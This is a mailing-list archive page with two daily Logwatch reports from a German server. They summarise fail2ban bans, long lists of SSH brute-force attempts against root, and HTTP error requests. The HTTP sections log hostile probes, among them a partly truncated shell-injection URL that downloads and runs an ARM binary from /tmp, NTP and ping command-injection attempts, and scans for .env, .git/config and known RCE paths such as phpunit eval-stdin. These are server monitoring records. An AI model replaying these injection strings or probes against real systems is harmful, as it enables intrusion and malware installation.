Februar 2021 - TOPF - ZaPF-Lists

Logwatch for h2361197.stratoserver.net (Linux)

by root＠zapf.in

################### Logwatch 7.4.0 (03/01/11) #################### Processing Initiated: Sun Feb 28 04:42:04 2021 Date Range Processed: yesterday ( 2021-Feb-27 ) Period is day. Detail Level of Output: 0 Type of Output/Format: mail / text Logfiles for Host: h2361197.stratoserver.net ################################################################## --------------------- fail2ban-messages Begin ------------------------ Banned services with Fail2Ban: Bans:Unbans ssh: [140:141] ---------------------- fail2ban-messages End ------------------------- --------------------- httpd Begin ------------------------ Connection attempts using mod_proxy: 125.72.95.251 -> zapf.wiki:443: 1 Time(s) 60.191.125.35 -> zapf.wiki:443: 1 Time(s) A total of 8 sites probed the server 159.65.206.162 172.104.242.173 185.153.197.179 20.52.134.161 222.186.136.150 37.120.247.100 5.8.10.202 89.248.170.112 Requests with error response codes 400 Bad Request null: 8 Time(s) /config/getuser?index=0: 4 Time(s) http://fuwu.sogou.com/404/index.html: 2 Time(s) zapf.wiki:443: 2 Time(s) ../../proc/: 1 Time(s) /cgi-bin/system_mgr.cgi?C1=ON&cmd=cgi_ntp_ ... _ntp_server=`cd: 1 Time(s) /confirm/%s: 1 Time(s) /op_type=ping&destination=cd: 1 Time(s) /shell?cd+/tmp;rm+arm+arm7;wget+http:/\x5C ... +arm;./arm+jaws: 1 Time(s) /w00tw00t.at.ISC.SANS.DFind:): 1 Time(s) 7: 1 Time(s) ;q\xDB\xB66\xB1\x13_DT\x22\xE6\x95\x0F\x8E ... \xB0GYh\xF1\x00: 1 Time(s) X\xD4>\x12\x98\xC4<\xE0\x13\xCF\x00\xAC\xA ... 5Cs\x9C\xBD\xCB: 1 Time(s) \x83tB\xCC\xAC\xF0`\x96\xD8\x9D\xCE\x88\xF ... A\x1A\x01oX\xA0: 1 Time(s) \x84\xB4,\x85\xAFn\xE3Y\xBBbhl\xFF(=':\xA9 ... B9\x90\x00(\xC0: 1 Time(s) \x8E\x1D\x97\x1E\x05{\x1A\xCB\xF2\x1E\xB0> ... 00x\x95\x9F\xCE: 1 Time(s) 404 Not Found /robots.txt: 97 Time(s) /wp-login.php: 6 Time(s) /.git/config: 4 Time(s) /reader/1993-wi-reader_st93.pdf: 4 Time(s) /.env: 3 Time(s) /berichte/WiSe14/Bericht_WiSe14-Bremen.pdf: 3 Time(s) /download/zapfev_satzung.pdf: 3 Time(s) /resolutionen/sose17/gesellschaftlich_vera ... wantwortung.pdf: 3 Time(s) /ads.txt: 2 Time(s) /wp-content/: 2 Time(s) //2019/wp-includes/wlwmanifest.xml: 1 Time(s) //2020/wp-includes/wlwmanifest.xml: 1 Time(s) //blog/wp-includes/wlwmanifest.xml: 1 Time(s) //cms/wp-includes/wlwmanifest.xml: 1 Time(s) //news/wp-includes/wlwmanifest.xml: 1 Time(s) //shop/wp-includes/wlwmanifest.xml: 1 Time(s) //site/wp-includes/wlwmanifest.xml: 1 Time(s) //sito/wp-includes/wlwmanifest.xml: 1 Time(s) //test/wp-includes/wlwmanifest.xml: 1 Time(s) //web/wp-includes/wlwmanifest.xml: 1 Time(s) //website/wp-includes/wlwmanifest.xml: 1 Time(s) //wordpress/wp-includes/wlwmanifest.xml: 1 Time(s) //wp-includes/wlwmanifest.xml: 1 Time(s) //wp/wp-includes/wlwmanifest.xml: 1 Time(s) //wp1/wp-includes/wlwmanifest.xml: 1 Time(s) //wp2/wp-includes/wlwmanifest.xml: 1 Time(s) //xmlrpc.php?rsd: 1 Time(s) /downloader: 1 Time(s) /home/verein: 1 Time(s) /home/zapf: 1 Time(s) /humans.txt: 1 Time(s) 499 (undefined) /apple-touch-icon.png: 1 Time(s) /favicon.png: 1 Time(s) 500 Internal Server Error /: 66 Time(s) /.env: 5 Time(s) /sitemap.txt: 5 Time(s) /robots.txt: 4 Time(s) /atom.xml: 3 Time(s) /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php: 2 Time(s) /.well-known/security.txt: 1 Time(s) /?XDEBUG_SESSION_START=phpstorm: 1 Time(s) /Autodiscover/Autodiscover.xml: 1 Time(s) /_ignition/execute-solution: 1 Time(s) /admin//config.php: 1 Time(s) /api/jsonws/invoke: 1 Time(s) /console/: 1 Time(s) /dns-query: 1 Time(s) /dns-query?dns=AAABAAABAAAAAAAAA3d3dwdleGFtcGxlA2NvbQAAAQAB: 1 Time(s) /index.php?s=/Index/\x5Cthink\x5Capp/invok ... HelloThinkPHP21: 1 Time(s) /mifs/.;/services/LogService: 1 Time(s) /owa/auth/logon.aspx?url=https%3a%2f%2f1%2fecp%2f: 1 Time(s) /sitemap_index.xml: 1 Time(s) /wp-content/plugins/wp-file-manager/readme.txt: 1 Time(s) ---------------------- httpd End ------------------------- --------------------- pam_unix Begin ------------------------ sshd: Authentication Failures: root (42.192.219.234): 69 Time(s) root (218.255.245.10): 68 Time(s) root (onion2.hosting.ovh.web-et-solutions.com): 68 Time(s) root (118.24.123.136): 67 Time(s) root (42.192.81.219): 66 Time(s) root (212.233.112.134): 65 Time(s) root (159.65.124.47): 64 Time(s) root (vps-7494662d.vps.ovh.net): 63 Time(s) root (83.11.42.97.ipv4.supernova.orange.pl): 61 Time(s) root (189.240.62.227): 60 Time(s) root (198.54.121.48): 60 Time(s) root (218.92.0.184): 60 Time(s) root (217.12.66.21): 59 Time(s) root (139.59.81.182): 58 Time(s) root (106.12.199.117): 57 Time(s) root (218.92.0.145): 57 Time(s) root (124.95.143.135): 55 Time(s) root (139.59.244.237): 55 Time(s) root (218.92.0.171): 53 Time(s) root (197.255.136.62): 52 Time(s) root (221.181.185.237): 52 Time(s) root (221.214.74.10): 52 Time(s) root (221.216.205.26): 52 Time(s) root (119.28.49.192): 51 Time(s) root (106.75.55.46): 50 Time(s) root (115.60.56.49): 50 Time(s) root (139.186.199.174): 50 Time(s) root (45.112.242.22): 50 Time(s) root (212.95.137.19): 48 Time(s) root (106.12.212.211): 46 Time(s) root (66.70.142.214): 46 Time(s) root (111.198.48.204): 45 Time(s) root (111.229.123.86): 43 Time(s) root (109.232.109.58): 42 Time(s) root (118.25.129.131): 41 Time(s) root (128.199.152.57): 41 Time(s) root (218.92.0.165): 41 Time(s) root (59.15.3.197): 40 Time(s) root (45.11.79.57): 38 Time(s) root (122.156.219.212): 37 Time(s) root (218.92.0.247): 36 Time(s) root (106.55.243.175): 35 Time(s) root (106.75.132.3): 35 Time(s) root (111.230.196.20): 35 Time(s) root (152.136.179.135): 35 Time(s) root (222.187.238.87): 35 Time(s) root (134.175.236.132): 33 Time(s) root (srv.metal-mine.com): 33 Time(s) root (222.122.31.133): 32 Time(s) root (106.75.101.149): 30 Time(s) root (140.143.189.29): 30 Time(s) root (101.ip-51-91-122.eu): 29 Time(s) root (221.181.185.140): 26 Time(s) root (vps-653e60f2.vps.ovh.ca): 25 Time(s) root (61.177.172.104): 24 Time(s) root (113.10.158.220): 23 Time(s) root (218.92.0.138): 22 Time(s) root (203.112.156.173): 20 Time(s) root (221.181.185.143): 20 Time(s) root (78.36.152.186): 20 Time(s) root (128.199.177.241): 18 Time(s) root (218.92.0.133): 18 Time(s) root (218.92.0.185): 18 Time(s) root (61.133.232.253): 18 Time(s) root (91.90.36.174): 18 Time(s) root (222.187.239.31): 14 Time(s) root (61.133.232.251): 9 Time(s) root (222.206.231.192): 7 Time(s) root (200-71-154-142.static.telcel.net.ve): 6 Time(s) root (218.92.0.157): 6 Time(s) root (61.76.169.138): 6 Time(s) root (121.4.35.38): 5 Time(s) root (77.ip-51-255-172.eu): 5 Time(s) root (193.169.255.236): 3 Time(s) root (61.133.232.248): 3 Time(s) root (61.133.232.249): 3 Time(s) root (61.133.232.254): 3 Time(s) root (ec2-3-138-34-49.us-east-2.compute.amazonaws.com): 3 Time(s) unknown (171.239.255.246): 3 Time(s) unknown (195.54.160.250): 3 Time(s) unknown (45.93.201.193): 3 Time(s) root (81.161.63.101): 2 Time(s) unknown (194.61.25.28): 2 Time(s) unknown (216.49.54.211.res-cmts.bus.ptd.net): 2 Time(s) unknown (77.39.8.64): 2 Time(s) unknown (94-36-242-115.adsl-ull.clienti.tiscali.it): 2 Time(s) postgres (193.169.255.236): 1 Time(s) postgres (ec2-3-138-34-49.us-east-2.compute.amazonaws.com): 1 Time(s) root (1.251.239.18): 1 Time(s) root (104.248.10.134): 1 Time(s) root (106.13.123.73): 1 Time(s) root (106.53.93.233): 1 Time(s) root (113.31.118.242): 1 Time(s) root (114.143.118.242): 1 Time(s) root (122.180.87.199): 1 Time(s) root (129.211.169.241): 1 Time(s) root (129.226.225.117): 1 Time(s) root (138.121.170.194.dnsgigas.es): 1 Time(s) root (141.105.105.81): 1 Time(s) root (157.230.190.90): 1 Time(s) root (178.62.214.85): 1 Time(s) root (178.62.255.152): 1 Time(s) root (180.167.240.222): 1 Time(s) root (194.61.25.28): 1 Time(s) root (195.158.28.62): 1 Time(s) root (200-97-250-150.user3p.veloxzone.com.br): 1 Time(s) root (201.122.102.21): 1 Time(s) root (201.238.215.131): 1 Time(s) root (209.45.54.107): 1 Time(s) root (222.239.28.177): 1 Time(s) root (27.111.44.196): 1 Time(s) root (39.109.122.173): 1 Time(s) root (47.95.253.249): 1 Time(s) root (49.234.223.241): 1 Time(s) root (49.235.119.51): 1 Time(s) root (49.7.164.91): 1 Time(s) root (51.15.229.144): 1 Time(s) root (61.133.232.252): 1 Time(s) root (81.161.63.103): 1 Time(s) root (81.70.230.199): 1 Time(s) root (82-65-27-68.subs.proxad.net): 1 Time(s) root (keeperpool.com): 1 Time(s) root (ns507177.ip-192-99-2.net): 1 Time(s) root (static.236.198.202.116.clients.your-server.de): 1 Time(s) unknown (186.232.141.21): 1 Time(s) unknown (218.2.28.94): 1 Time(s) unknown (ec2-3-138-34-49.us-east-2.compute.amazonaws.com): 1 Time(s) Invalid Users: Unknown Account: 20 Time(s) ---------------------- pam_unix End ------------------------- --------------------- Postfix Begin ------------------------ 12 Miscellaneous warnings 19.283K Bytes accepted 19,746 19.283K Bytes sent via SMTP 19,746 ======== ================================================== 1 Accepted 100.00% -------- -------------------------------------------------- 1 Total 100.00% ======== ================================================== 2 4xx Reject relay denied 100.00% -------- -------------------------------------------------- 2 Total 4xx Rejects 100.00% ======== ================================================== 78 Connections 1 Connections lost (inbound) 78 Disconnections 1 Removed from queue 1 Sent via SMTP 3 Hostname verification errors (FCRDNS) ---------------------- Postfix End ------------------------- --------------------- sendmail-largeboxes (large mail spool files) Begin ------------------------ Large Mailbox threshold: 40MB (41943040 bytes) Warning: Large mailbox: mailman.gz (1747199807) Warning: Large mailbox: mailman (235703599967) ---------------------- sendmail-largeboxes (large mail spool files) End ------------------------- --------------------- SSHD Begin ------------------------ Disconnecting after too many authentication failures for user: root : 58 Time(s) Failed logins from: 1.251.239.18: 1 time 3.138.34.49 (ec2-3-138-34-49.us-east-2.compute.amazonaws.com): 4 times 27.111.44.196: 1 time 39.109.122.173: 1 time 42.192.81.219: 66 times 42.192.219.234: 69 times 45.11.79.57: 38 times 45.112.242.22: 50 times 47.95.253.249: 1 time 49.7.164.91: 1 time 49.234.223.241: 1 time 49.235.119.51: 1 time 51.15.229.144 (144-229-15-51.instances.scw.cloud): 1 time 51.83.132.19 (vps-7494662d.vps.ovh.net): 63 times 51.91.122.101 (101.ip-51-91-122.eu): 29 times 51.255.172.77 (77.ip-51-255-172.eu): 5 times 59.15.3.197: 40 times 61.76.169.138: 6 times 61.133.232.248: 3 times 61.133.232.249: 3 times 61.133.232.251: 9 times 61.133.232.252: 1 time 61.133.232.253: 18 times 61.133.232.254: 3 times 61.177.172.104: 24 times 66.45.232.18 (srv.metal-mine.com): 33 times 66.70.142.214: 46 times 78.36.152.186 (78-36-152-186.novgorod-avto.ru): 20 times 81.70.230.199: 1 time 81.161.63.101: 2 times 81.161.63.103: 1 time 82.65.27.68 (82-65-27-68.subs.proxad.net): 1 time 83.11.42.97 (83.11.42.97.ipv4.supernova.orange.pl): 61 times 91.90.36.174 (174-36-90-91.omsk.mts.mkc-omsk.ru): 18 times 104.248.10.134: 1 time 106.12.199.117: 57 times 106.12.212.211: 46 times 106.13.123.73: 1 time 106.53.93.233: 1 time 106.55.243.175: 35 times 106.75.55.46: 50 times 106.75.101.149: 30 times 106.75.132.3: 35 times 109.232.109.58: 42 times 111.198.48.204: 45 times 111.229.123.86: 43 times 111.230.196.20: 35 times 113.10.158.220: 23 times 113.31.118.242: 1 time 114.143.118.242: 1 time 115.60.56.49 (hn.kd.ny.adsl): 50 times 116.202.198.236 (static.236.198.202.116.clients.your-server.de): 1 time 118.24.123.136: 67 times 118.25.129.131: 41 times 119.28.49.192: 51 times 121.4.35.38: 5 times 122.156.219.212: 37 times 122.180.87.199 (abts-north-static-199.87.180.122.airtelbroadband.in): 1 time 124.95.143.135: 55 times 128.199.152.57: 41 times 128.199.177.241: 18 times 129.211.169.241: 1 time 129.226.225.117: 1 time 134.175.236.132: 33 times 138.121.170.194 (138.121.170.194.dnsgigas.es): 1 time 139.59.81.182: 58 times 139.59.244.237: 55 times 139.186.199.174: 50 times 140.143.189.29: 30 times 141.105.105.81: 1 time 152.136.179.135: 35 times 157.230.190.90: 1 time 159.65.124.47: 64 times 159.203.37.63 (keeperpool.com): 1 time 167.114.67.230 (vps-653e60f2.vps.ovh.ca): 25 times 178.33.216.187 (onion2.hosting.ovh.web-et-solutions.com): 68 times 178.62.214.85: 1 time 178.62.255.152: 1 time 180.167.240.222: 1 time 189.240.62.227 (customer-189-240-62-227.uninet-ide.com.mx): 60 times 192.99.2.41 (ns507177.ip-192-99-2.net): 1 time 193.169.255.236: 4 times 194.61.25.28: 1 time 195.158.28.62 (mail.ereport.uz): 1 time 197.255.136.62 (bl4.197.255.136.62.dynamic.dsl.cvmultimedia.cv): 52 times 198.54.121.48: 60 times 200.71.154.142 (200-71-154-142.static.telcel.net.ve): 6 times 200.97.250.150 (200-97-250-150.user3p.veloxzone.com.br): 1 time 201.122.102.21 (dsl-201-122-102-21-sta.prod-empresarial.com.mx): 1 time 201.238.215.131 (static.201.238.215.131.gtdinternet.com): 1 time 203.112.156.173: 20 times 209.45.54.107: 1 time 212.95.137.19: 48 times 212.233.112.134: 65 times 217.12.66.21 (217x12x66x21.dynamic.rostov.ertelecom.ru): 59 times 218.92.0.133: 18 times 218.92.0.138: 22 times 218.92.0.145: 57 times 218.92.0.157: 6 times 218.92.0.165: 41 times 218.92.0.171: 53 times 218.92.0.184: 61 times 218.92.0.185: 18 times 218.92.0.247: 37 times 218.255.245.10 (static.reserve.wtt.net.hk): 68 times 221.181.185.140: 30 times 221.181.185.143: 24 times 221.181.185.237: 60 times 221.214.74.10: 52 times 221.216.205.26: 52 times 222.122.31.133: 32 times 222.187.238.87: 39 times 222.187.239.31: 18 times 222.206.231.192: 7 times 222.239.28.177: 1 time Illegal users from: undef: 11 times 3.138.34.49 (ec2-3-138-34-49.us-east-2.compute.amazonaws.com): 1 time 45.93.201.193: 3 times 65.49.20.66 (scan-17.shadowserver.org): 1 time 77.39.8.64 (host-77-39-8-64.stavropol.ru): 2 times 94.36.242.115 (94-36-242-115.adsl-ull.clienti.tiscali.it): 2 times 171.239.255.246 (dynamic-adsl.viettel.vn): 3 times 186.232.141.21 (fastnetwork.141.21.host.fastnetwork.com.br): 1 time 194.61.25.28: 3 times 195.54.160.250: 3 times 216.49.54.211 (216.49.54.211.res-cmts.bus.ptd.net): 2 times 218.2.28.94: 1 time **Unmatched Entries** fatal: no matching cipher found: client aes256-cbc,rijndael-cbc(a)lysator.liu.se,aes192-cbc,aes128-cbc,arcfour128,arcfour,3des-cbc,none server aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com [preauth] : 1 time(s) ---------------------- SSHD End ------------------------- --------------------- Disk Space Begin ------------------------ Filesystem Size Used Avail Use% Mounted on /dev/ploop47755p1 394G 242G 132G 65% / none 4.0G 0 4.0G 0% /dev ---------------------- Disk Space End ------------------------- ###################### Logwatch End #########################

4 Jahre, 7 Monate

1
0
0 / 0

Logwatch for h2361197.stratoserver.net (Linux)

by root＠zapf.in

################### Logwatch 7.4.0 (03/01/11) #################### Processing Initiated: Sat Feb 27 04:42:04 2021 Date Range Processed: yesterday ( 2021-Feb-26 ) Period is day. Detail Level of Output: 0 Type of Output/Format: mail / text Logfiles for Host: h2361197.stratoserver.net ################################################################## --------------------- fail2ban-messages Begin ------------------------ Banned services with Fail2Ban: Bans:Unbans ssh: [186:185] ---------------------- fail2ban-messages End ------------------------- --------------------- httpd Begin ------------------------ Connection attempts using mod_proxy: 113.128.104.245 -> zapf.wiki:443: 1 Time(s) 222.186.136.150 -> zapf.wiki:443: 2 Time(s) A total of 8 sites probed the server 113.87.98.99 172.104.242.173 176.58.124.134 222.186.136.150 46.101.15.242 49.49.237.159 5.188.210.227 61.219.11.153 Requests with error response codes 400 Bad Request null: 10 Time(s) zapf.wiki:443: 3 Time(s) /socket.io/?noteId=0xjIvVp7Q-&EIO=3&transp ... _tItGW_b-ZuADi2: 2 Time(s) /socket.io/?noteId=0xjIvVp7Q-&EIO=3&transp ... oACjQ341e2mADi1: 2 Time(s) ../../proc/: 1 Time(s) /0bef: 1 Time(s) /socket.io/?noteId=0xjIvVp7Q-&EIO=3&transp ... x5Kzpee0UdjADi3: 1 Time(s) /w00tw00t.at.ISC.SANS.DFind:): 1 Time(s) G?\xC7)J\x08\xB5+^9\x16j: 1 Time(s) X\xD4>\x12\x98\xC4<\xE0\x13\xCF\x00\xAC\xA ... 5Cs\x9C\xBD\xCB: 1 Time(s) \xDF\xA4\x91\xB1H\xAA\xB4v2\x0E\xAB\x9Fug\ ... x09\xC0\x14\xC0: 1 Time(s) http://5.188.210.227/echo.php: 1 Time(s) 404 Not Found /robots.txt: 59 Time(s) /wp-login.php: 4 Time(s) /.env: 1 Time(s) /berlin/orientierung/apple-touch-icon.png: 1 Time(s) /blog/wp-login.php: 1 Time(s) /reader/2017_SoSe_Berlin.pdf%7C: 1 Time(s) /sites/default/files/2006_SoSe_Dresden.pdf: 1 Time(s) /user: 1 Time(s) /verein/mitgliederver-: 1 Time(s) /wordpress/wp-login.php: 1 Time(s) /wp-content/: 1 Time(s) /wp/wp-login.php: 1 Time(s) 499 (undefined) /: 8 Time(s) /apple-touch-icon.png: 5 Time(s) /build/cover.fef3ca2736298be630a4.css: 2 Time(s) /favicon.png: 2 Time(s) /fonts/SourceSansPro-Regular.woff: 2 Time(s) /build/af7ae505a9eed503f8b8e6982036873e.woff2: 1 Time(s) /build/cover-styles-pack.fef3ca2736298be630a4.css: 1 Time(s) /build/font-pack.fef3ca2736298be630a4.css: 1 Time(s) /fonts/SourceSansPro-Light.woff: 1 Time(s) /fonts/SourceSansPro-Semibold.woff: 1 Time(s) /reso_pruefungsdurchfuehrung?edit: 1 Time(s) /socket.io/?noteId=0xjIvVp7Q-&EIO=3&transp ... _tItGW_b-ZuADi2: 1 Time(s) /socket.io/?noteId=0xjIvVp7Q-&EIO=3&transp ... oACjQ341e2mADi1: 1 Time(s) /socket.io/?noteId=0xjIvVp7Q-&EIO=3&transp ... x5Kzpee0UdjADi3: 1 Time(s) 500 Internal Server Error /: 44 Time(s) /sitemap.txt: 12 Time(s) /atom.xml: 8 Time(s) /robots.txt: 8 Time(s) /sitemap.xml: 6 Time(s) /sitemap_index.xml: 5 Time(s) /.env: 4 Time(s) /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php: 3 Time(s) /Autodiscover/Autodiscover.xml: 2 Time(s) /api/jsonws/invoke: 2 Time(s) /console/: 2 Time(s) /index.php?s=/Index/\x5Cthink\x5Capp/invok ... HelloThinkPHP21: 2 Time(s) /mifs/.;/services/LogService: 2 Time(s) /wp-content/plugins/wp-file-manager/readme.txt: 2 Time(s) /?XDEBUG_SESSION_START=phpstorm: 1 Time(s) /_ignition/execute-solution: 1 Time(s) /actuator/health: 1 Time(s) /admin//config.php: 1 Time(s) /sitemap.xml.gz: 1 Time(s) 502 Bad Gateway /berlin/newsletter/newsletter-subscribe: 1 Time(s) 503 Service Unavailable /robots.txt: 2 Time(s) /ByqMq4yFD: 1 Time(s) /SkopF41FD: 1 Time(s) ---------------------- httpd End ------------------------- --------------------- pam_unix Begin ------------------------ sshd: Authentication Failures: root (61.177.172.104): 108 Time(s) root (152.32.174.171): 70 Time(s) root (64.225.20.97): 70 Time(s) root (142.93.63.163): 69 Time(s) root (177.134.162.152): 69 Time(s) root (112.54.37.119): 67 Time(s) root (161.35.47.220): 66 Time(s) root (218.92.0.133): 66 Time(s) root (v133-130-118-86.a049.g.tyo1.static.cnode.io): 66 Time(s) root (128.199.35.202): 64 Time(s) root (195.97.75.174): 64 Time(s) root (199.19.76.101): 64 Time(s) root (vmi527840.contaboserver.net): 64 Time(s) unknown (vmi527840.contaboserver.net): 64 Time(s) root (222.73.62.184): 63 Time(s) root (68.183.22.85): 63 Time(s) root (142.93.195.157): 62 Time(s) root (182.254.168.205): 62 Time(s) root (192.241.202.169): 62 Time(s) root (81.69.251.46): 62 Time(s) root (49.235.113.84): 61 Time(s) root (94.159.31.10): 61 Time(s) root (195.70.60.100): 60 Time(s) root (111.67.194.41): 58 Time(s) root (51.103.81.155): 58 Time(s) root (ip146.ip-176-31-69.eu): 58 Time(s) root (138.68.184.70): 57 Time(s) root (140.206.157.242): 57 Time(s) root (159.65.142.192): 57 Time(s) root (159.89.197.1): 57 Time(s) root (187.72.223.203): 57 Time(s) root (27.111.44.196): 57 Time(s) root (39.109.127.162): 57 Time(s) root (101.36.178.48): 56 Time(s) root (139.59.81.182): 56 Time(s) root (175.176.37.136): 56 Time(s) root (114.80.157.205): 55 Time(s) root (159.65.15.143): 55 Time(s) root (178.128.88.244): 55 Time(s) root (106.75.224.132): 54 Time(s) root (120.131.3.91): 54 Time(s) root (134.175.224.105): 54 Time(s) root (167.250.48.115): 54 Time(s) root (218.92.0.184): 54 Time(s) root (221.181.185.237): 54 Time(s) root (104.248.132.227): 53 Time(s) root (122.11.148.38): 53 Time(s) root (119.147.69.184): 52 Time(s) root (128.199.144.54): 52 Time(s) root (168.138.230.95): 52 Time(s) root (115.71.64.117): 51 Time(s) root (124.95.184.43): 51 Time(s) root (154.0.6.24): 50 Time(s) root (host9.190-226-244.telecom.net.ar): 50 Time(s) root (mx1.eitd.gov.kh): 50 Time(s) root (106.75.167.133): 49 Time(s) root (182.254.151.198): 49 Time(s) root (81.71.120.65): 49 Time(s) root (95.85.28.125): 49 Time(s) root (170.254.226.157): 48 Time(s) root (43.245.185.66): 48 Time(s) root (113.87.224.181): 47 Time(s) root (183.129.163.142): 47 Time(s) root (210.56.23.100): 47 Time(s) root (route.datahinge.com): 47 Time(s) root (41.204.7.74): 45 Time(s) root (104.236.72.182): 44 Time(s) root (68.183.134.38): 44 Time(s) root (218.92.0.138): 42 Time(s) root (218.92.0.185): 42 Time(s) root (218.92.0.247): 42 Time(s) root (78.36.152.186): 41 Time(s) root (117.220.15.119): 40 Time(s) root (182.61.19.134): 40 Time(s) root (124.156.155.59): 39 Time(s) root (128.199.177.241): 39 Time(s) root (181.63.248.149): 39 Time(s) root (157.245.252.34): 37 Time(s) root (150.158.172.248): 36 Time(s) root (dsl-emcali-200.29.109.193.emcali.net.co): 36 Time(s) root (119.45.60.204): 35 Time(s) root (132.232.4.140): 35 Time(s) root (206.189.194.249): 35 Time(s) root (42.193.2.20): 35 Time(s) root (106.13.31.93): 34 Time(s) root (110.10.178.51): 33 Time(s) root (1.180.211.139): 32 Time(s) root (201.149.49.146): 31 Time(s) root (81.68.108.77): 31 Time(s) root (117.173.67.119): 26 Time(s) root (201.149.49.162): 26 Time(s) root (218.92.0.171): 24 Time(s) root (104.131.40.125): 23 Time(s) root (91.90.36.174): 21 Time(s) root (221.181.185.143): 20 Time(s) root (222.187.239.31): 20 Time(s) root (120.53.233.197): 18 Time(s) root (178.128.127.126): 18 Time(s) root (218.92.0.145): 18 Time(s) root (221.181.185.140): 18 Time(s) root (218.92.0.165): 17 Time(s) root (190.145.123.26): 14 Time(s) root (vps-58038cba.vps.ovh.net): 14 Time(s) unknown (117.173.67.119): 11 Time(s) root (201.72.190.101): 10 Time(s) root (111.67.204.237): 9 Time(s) root (192.241.209.46): 9 Time(s) root (101.ip-51-91-122.eu): 8 Time(s) root (134.175.236.132): 8 Time(s) root (209.141.45.21): 6 Time(s) root (222.187.238.87): 6 Time(s) root (218.92.0.157): 5 Time(s) root (49.233.54.212): 5 Time(s) root (222.206.231.192): 4 Time(s) unknown (175.176.160.62): 3 Time(s) unknown (185.36.81.52): 3 Time(s) unknown (45.93.201.193): 3 Time(s) root (163.172.60.154): 2 Time(s) root (42.193.181.249): 2 Time(s) unknown (141.98.80.29): 2 Time(s) unknown (141.98.80.90): 2 Time(s) unknown (141.98.80.93): 2 Time(s) unknown (185.220.102.243): 2 Time(s) unknown (86-94-73-194.fixed.kpn.net): 2 Time(s) unknown (91-173-12-250.subs.proxad.net): 2 Time(s) unknown (n106-70-8-107.rdl1.qld.optusnet.com.au): 2 Time(s) root (102.ip-51-254-32.eu): 1 Time(s) root (104.248.203.117): 1 Time(s) root (113.161.174.240): 1 Time(s) root (119.29.18.39): 1 Time(s) root (121.226.166.244): 1 Time(s) root (124.156.214.135): 1 Time(s) root (130.ip-92-222-90.eu): 1 Time(s) root (141.98.80.89): 1 Time(s) root (141.98.80.91): 1 Time(s) root (141.98.80.92): 1 Time(s) root (149.129.136.55): 1 Time(s) root (156.ip-51-77-146.eu): 1 Time(s) root (159.89.132.200): 1 Time(s) root (161.35.17.214): 1 Time(s) root (178.128.221.85): 1 Time(s) root (180.166.114.14): 1 Time(s) root (180.250.97.19): 1 Time(s) root (181.123.13.77): 1 Time(s) root (185.36.81.52): 1 Time(s) root (202.28.221.106): 1 Time(s) root (202.51.74.123): 1 Time(s) root (49.233.2.204): 1 Time(s) root (51.159.35.29): 1 Time(s) root (52.172.170.61): 1 Time(s) root (ip-160-153-235-106.ip.secureserver.net): 1 Time(s) unknown (141.98.80.89): 1 Time(s) unknown (141.98.80.91): 1 Time(s) unknown (141.98.80.92): 1 Time(s) unknown (218.23.156.227): 1 Time(s) unknown (41.204.7.74): 1 Time(s) unknown (81.214.63.228): 1 Time(s) Invalid Users: Unknown Account: 104 Time(s) ---------------------- pam_unix End ------------------------- --------------------- Postfix Begin ------------------------ 14 Miscellaneous warnings 16.365K Bytes accepted 16,758 16.365K Bytes sent via SMTP 16,758 ======== ================================================== 1 Accepted 100.00% -------- -------------------------------------------------- 1 Total 100.00% ======== ================================================== 1 4xx Reject relay denied 100.00% -------- -------------------------------------------------- 1 Total 4xx Rejects 100.00% ======== ================================================== 76 Connections 13 Connections lost (inbound) 76 Disconnections 1 Removed from queue 1 Sent via SMTP 1 SMTP dialog errors 1 Hostname verification errors (FCRDNS) ---------------------- Postfix End ------------------------- --------------------- sendmail-largeboxes (large mail spool files) Begin ------------------------ Large Mailbox threshold: 40MB (41943040 bytes) Warning: Large mailbox: mailman.gz (1747199807) Warning: Large mailbox: mailman (235703599967) ---------------------- sendmail-largeboxes (large mail spool files) End ------------------------- --------------------- SSHD Begin ------------------------ Disconnecting after too many authentication failures for user: root : 70 Time(s) Failed logins from: 1.180.211.139: 32 times 27.111.44.196: 57 times 39.109.127.162: 57 times 41.204.7.74: 45 times 42.193.2.20: 35 times 42.193.181.249: 2 times 43.245.185.66 (ip66-185-245-43.as131755.net): 48 times 49.233.2.204: 1 time 49.233.54.212: 5 times 49.235.113.84: 61 times 51.77.146.156 (156.ip-51-77-146.eu): 1 time 51.83.132.153 (vps-58038cba.vps.ovh.net): 14 times 51.91.122.101 (101.ip-51-91-122.eu): 8 times 51.103.81.155: 58 times 51.159.35.29 (51-159-35-29.rev.poneytelecom.eu): 1 time 51.254.32.102 (102.ip-51-254-32.eu): 1 time 52.172.170.61: 1 time 61.177.172.104: 108 times 64.225.20.97: 70 times 68.183.22.85: 63 times 68.183.134.38: 44 times 78.36.152.186 (78-36-152-186.novgorod-avto.ru): 41 times 81.68.108.77: 31 times 81.69.251.46: 62 times 81.71.120.65: 49 times 91.90.36.174 (174-36-90-91.omsk.mts.mkc-omsk.ru): 21 times 92.222.90.130 (130.ip-92-222-90.eu): 1 time 94.159.31.10: 61 times 95.85.28.125: 49 times 101.36.178.48: 56 times 103.134.177.163 (mx1.eitd.gov.kh): 50 times 104.131.40.125: 23 times 104.236.72.182: 44 times 104.248.132.227: 53 times 104.248.203.117: 1 time 106.13.31.93: 34 times 106.75.167.133: 49 times 106.75.224.132: 54 times 110.10.178.51: 33 times 111.67.194.41: 58 times 111.67.204.237: 9 times 112.54.37.119: 67 times 113.87.224.181: 47 times 113.161.174.240 (static.vnpt.vn): 1 time 114.80.157.205: 55 times 115.71.64.117: 51 times 117.173.67.119: 26 times 117.220.15.119: 40 times 119.29.18.39: 1 time 119.45.60.204: 35 times 119.147.69.184: 52 times 120.53.233.197: 18 times 120.131.3.91: 54 times 121.226.166.244: 1 time 122.11.148.38: 53 times 124.95.184.43: 51 times 124.156.155.59: 39 times 124.156.214.135: 1 time 128.199.35.202: 64 times 128.199.144.54: 52 times 128.199.177.241: 39 times 132.232.4.140: 35 times 133.130.118.86 (v133-130-118-86.a049.g.tyo1.static.cnode.io): 66 times 134.175.224.105: 54 times 134.175.236.132: 8 times 138.68.184.70: 57 times 139.59.81.182: 56 times 140.206.157.242: 57 times 141.98.80.89: 1 time 141.98.80.91: 1 time 141.98.80.92: 1 time 142.93.63.163: 69 times 142.93.195.157: 62 times 149.129.136.55: 1 time 150.158.172.248: 36 times 152.32.174.171: 70 times 154.0.6.24: 50 times 157.245.252.34 (dev.pana): 37 times 159.65.15.143: 55 times 